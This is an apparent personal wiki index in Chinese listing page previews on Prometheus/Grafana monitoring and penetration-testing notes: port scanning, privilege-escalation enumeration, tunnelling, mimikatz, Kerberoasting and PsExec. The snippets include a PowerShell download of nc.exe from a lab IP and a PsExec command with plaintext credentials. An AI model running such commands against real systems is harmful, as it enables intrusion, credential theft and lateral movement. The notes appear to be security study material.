跳到主內容

最近更新的頁面

Prometheus 相關資源

官方範例設定檔 prometheus-book prometheus實戰

Grafana 下拉選單(prometheus)

  prometheus  prometheus 設定檔,新增自訂label

Actuator+Prometheus+Grafana監控視覺化簡介

https://www.tpisoftware.com/tpu/articleDetails/2446 pom.xml 需增加以下依賴: <dependency> <groupId>o...

【PortScan】Masscan

Masscan是網路大規模的連接埠掃描儀。它可以在5分鐘內掃描整個互聯網,每秒從一台機器上傳輸1000萬個資料包(和掃描者的頻寬有關,掃描速率高容易誤報) https://github.com...

【 Mac】安裝netdata

$ brew update $ brew install netdata $ brew services start netdata # prometheus 格式 http://10....

【Windows】【弱掃】Seatbelt

Seatbelt 是一個 C# 項目,從進攻性和防禦性安全角度執行許多面向安全的主機調查「安全檢查」。 # 下載 wget https://github.com/r3motecontrol/...

【kali】未安裝工具

rockyou(seclists) /usr/share/seclists # 安裝 sudo apt update sudo apt install -y seclists cd...

【linux】【提權】【弱掃】linpeas

# install sudo apt-get update sudo apt-get -y install peass # 複製到本地 kali@kali:~$ cp /usr/sh...

【Windows】【列舉】常用命令

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe net user net u...

【PowerShell】相關資源

  別人整理的筆記https://sdwh.dev/posts/2020/09/PowerShell-CheatSheet/

【Tunnel】Port forwarding and Tunneling

Port forwarding socat : 課本18.2 範例 rinetd:它更適合長期的端口轉發配置,但對於臨時端口轉發解決方案來說可能稍微不夠靈活。 Netcat + 命名管道文...

【Tunneling】dnscat2

原生 dnscat2 https://teamssix.com/210608-150224.html https://github.com/iagox86/dnscat2   kali ...

【Tip】關於 bash

【Tip】無痕模式 bash script -c /bin/bash -q /dev/null   這個指令使用了 `script` 工具,該工具通常用於記錄終端會話。下面是詳細解釋: ...

【Tunneling】Chisel

# kali下載 wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd...

【轉載】Emotet病毒惡意文件分析實例

https://www.uuu.com.tw/Public/content/article/21/20210308.htm 主要是想寫 cyberchef 組合用法,有空再整理  

Grafana alerting

https://www.cnblogs.com/liugp/p/17003484.html

【Windows】登入方法

密碼 取得方法: 密碼噴灑 crackmapexe hash破解 # impacket-GetUserSPNs => Kerberoasting攻擊 取得hash # hashc...

【雜湊】【AD】mimikatz

PS C:\Windows\system32> cd C:\Tools PS C:\Tools\> .\mimikatz.exe ... mimikatz # privilege:...

【powershell】【橫移】PsExec

  # 使用帳密連線至另一主機 .\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd

【反向 shell】

https://gchq.github.io/CyberChef https://www.online-python.com/ Online - Reverse Shell Generato...